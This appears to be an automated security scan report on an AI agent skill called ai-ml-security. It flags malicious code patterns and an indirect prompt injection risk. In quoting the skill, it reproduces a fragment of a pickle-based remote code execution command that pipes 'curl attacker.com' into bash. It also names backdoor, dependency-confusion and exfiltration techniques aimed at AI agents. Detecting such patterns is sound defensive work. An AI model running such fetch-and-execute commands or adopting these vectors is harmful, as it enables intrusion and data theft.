ai-ml-security

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). The skill text contains explicit, actionable malicious patterns — e.g., a pickle-based RCE example that runs "curl attacker.com/... | bash", model backdoor/poisoning triggers, dependency-confusion and post-install code-execution vectors, and agent workflows that instruct unauthorized data exfiltration — all of which demonstrate deliberate backdoor, RCE and exfiltration techniques.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill explicitly instructs fetching and inspecting models and repository code from public sources (e.g., Section 1.2's "Users download via `from_pretrained('attacker/model')" and the Decision Tree/Hugging Face checks), so the agent is expected to read untrusted, user-provided third‑party model files and configs that can materially alter behavior.